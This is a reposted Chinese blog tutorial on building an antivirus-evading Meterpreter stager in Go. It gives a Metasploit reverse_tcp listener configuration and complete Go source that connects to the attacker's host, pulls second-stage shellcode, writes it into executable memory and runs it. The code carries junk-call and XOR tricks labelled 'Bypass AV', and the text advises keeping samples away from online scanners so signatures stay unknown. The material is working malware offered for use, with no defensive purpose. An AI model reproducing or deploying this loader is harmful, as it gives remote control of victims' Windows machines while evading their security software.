文章内容可能有些地方暂时不能过免杀!但是需要注意的一点是、在免杀里面你越偏门的语言、越冷门没人用!反而用处最大最好!为啥呢?因为对方的匹配库还没有你的特征、所以可以过免杀。并且当你自己生成一个马后、不需要放在各种在线杀软里面去查看识别、毕竟会上传特征、可以直接本地搭建环境针对某些杀软进行针对性的操作!
kali 配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 8.8.8.8
set lport 8888
run
编译golang
修改golang代码的main函数中的变量S为
http://kali监听ip:kali监听端口
http://8.8.8.8:8888
项目下载地址:https://github.com/insightglacier/go_meterpreter
golang 代码:
package main
import (
"encoding/binary"
"strconv"
"strings"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var MagicNumber int64 = 5
//Bypass AV
func Jump() {
MagicNumber++
hop1()
}
func hop1() {
MagicNumber++
hop2()
}
func hop2() {
MagicNumber++
hop3()
}
func hop3() {
MagicNumber++
hop4()
}
func hop4() {
MagicNumber++
hop5()
}
func hop5() {
MagicNumber++
hop6()
}
func hop6() {
MagicNumber++
hop7()
}
func hop7() {
MagicNumber++
hop8()
}
func hop8() {
MagicNumber++
hop9()
}
func hop9() {
MagicNumber++
hop10()
}
func hop10() {
MagicNumber++
}
//Meterpreter
func mp(Address string) {
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
var WSA_Data syscall.WSAData
syscall.WSAStartup(uint32(0x202), &WSA_Data)
Socket, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)
AddressArray := strings.Split(Address, ":")
IP_Array_Str := strings.Split(AddressArray[0], ".")
var IP_Array_Int [4]int
for i := 0; i < 4; i++ {
IP_Array_Int[i], _ = strconv.Atoi(IP_Array_Str[i])
}
PortInt, _ := strconv.Atoi(AddressArray[1])
Socket_Addr := syscall.SockaddrInet4{Port: PortInt, Addr: [4]byte{byte(IP_Array_Int[0]), byte(IP_Array_Int[1]), byte(IP_Array_Int[2]), byte(IP_Array_Int[3])}}
syscall.Connect(Socket, &Socket_Addr)
var SecondStageLengt [4]byte
WSA_Buffer := syscall.WSABuf{Len: uint32(4), Buf: &SecondStageLengt[0]}
Flags := uint32(0)
DataReceived := uint32(0)
syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &Flags, nil, nil)
SecondStageLengthInt := binary.LittleEndian.Uint32(SecondStageLengt[:])
SecondStageBuffer := make([]byte, SecondStageLengthInt)
var Shellcode []byte
WSA_Buffer = syscall.WSABuf{Len: SecondStageLengthInt, Buf: &SecondStageBuffer[0]}
Flags = uint32(0)
DataReceived = uint32(0)
TotalDataReceived := uint32(0)
for TotalDataReceived < SecondStageLengthInt {
syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &Flags, nil, nil)
for i := 0; i < int(DataReceived); i++ {
Shellcode = append(Shellcode, SecondStageBuffer[i])
}
TotalDataReceived += DataReceived
}
Addr, _, _ := VirtualAlloc.Call(0, uintptr(SecondStageLengthInt+5), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr))
SocketPtr := (uintptr)(unsafe.Pointer(Socket))
//x86 0xBF; 5 bytes
// BF 78 56 34 12 => mov edi, 0x12345678
AddrPtr[0] = 0xAF ^ 0x10 //0xBF
//X64 0x48BF; 10 bytes
// 48 BF 78 56 34 12 00 00 00 00 => mov rdi, 0x12345678
AddrPtr[1] = byte(SocketPtr)
AddrPtr[2] = 0x00
AddrPtr[3] = 0x00
AddrPtr[4] = 0x00
for i, j := range Shellcode {
Jump()
AddrPtr[i+5] = j
}
syscall.Syscall(Addr, 0, 0, 0, 0)
}
func main() {
s := "http://8.8.8.8:8888"
Jump()
mp(s[7:])
}
运行
直接终端运行 res.exe
结果如下
文章授权转载至:https://xljtj.com/archives/go-meterpreter.html
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!